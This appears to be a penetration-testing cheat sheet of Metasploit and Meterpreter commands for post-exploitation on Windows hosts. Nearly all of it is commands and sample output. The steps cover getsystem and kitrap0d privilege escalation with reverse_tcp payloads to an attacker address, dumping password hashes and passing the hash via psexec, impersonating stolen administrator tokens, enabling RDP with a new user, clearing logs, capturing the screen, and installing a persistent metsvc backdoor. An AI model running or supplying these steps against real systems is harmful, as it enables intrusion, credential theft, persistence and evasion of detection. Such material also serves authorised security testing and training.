Windows Post Exploitation

#Meterpreter privesc
meterpreter > use priv
meterpreter > getsystem -h
meterpreter > getsystem
meterpreter > getuid

meterpreter > getsystem[-] priv_elevate_getsystem: Operation failed: Access is denied.
meterpreter > background
msf exploit(ms10_002_aurora) > use exploit/windows/local/
msf exploit(ms10_002_aurora) > use exploit/windows/local/ms10_015_kitrap0d
msf exploit(ms10_015_kitrap0d) > set SESSION 1
msf exploit(ms10_015_kitrap0d) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms10_015_kitrap0d) > set LHOST 192.168.1.161
msf exploit(ms10_015_kitrap0d) > set LPORT 4443
msf exploit(ms10_015_kitrap0d) > show options
msf exploit(ms10_015_kitrap0d) > exploit
meterpreter > getuid
#Server username: NT AUTHORITY\SYSTEM

Hashdump and Pass The Hash

meterpreter > run post/windows/gather/hashdump 
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.57.133
msf exploit(psexec) > set LPORT 443
msf exploit(psexec) > set RHOST 192.168.57.131
msf exploit(psexec) > show options
msf exploit(psexec) > set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
msf exploit(psexec) > exploit
meterpreter > shell

Stealing Tokens (Incognito)

meterpreter > use incognito
meterpreter > help
meterpreter > list_tokens -u
#Delegation Tokens Available
#========================================
#NT AUTHORITY\LOCAL SERVICE
#NT AUTHORITY\NETWORK SERVICE
#NT AUTHORITY\SYSTEM
#SNEAKS.IN\Administrator

meterpreter > impersonate_token SNEAKS.IN\\Administrator
#[+] Delegation token available
#[+] Successfully impersonated user SNEAKS.IN\Administrator
meterpreter > getuid
#Server username: SNEAKS.IN\Administrator

Enable RDP and create User

meterpreter > run getgui -h
meterpreter > run getgui -u loneferret -p password

Clearing logs

meterpreter > run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20110112.2448.rc

Screen Capture

meterpreter > ps
#260   Explorer.EXE         C:\WINDOWS\Explorer.EXE
meterpreter > migrate 260
meterpreter > use espia
meterpreter > screengrab 
# 
Screenshot saved to: /root/nYdRUppb.jpeg

Backdoor

msf exploit(3proxy) > exploit
meterpreter > ps
meterpreter > migrate 632
meterpreter > run metsvc -h
meterpreter > run metsvc

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp
#PAYLOAD => windows/metsvc_bind_tcp
msf exploit(handler) > set LPORT 31337
#LPORT => 31337
msf exploit(handler) > set RHOST 192.168.1.104
#RHOST => 192.168.1.104

msf exploit(handler) > exploit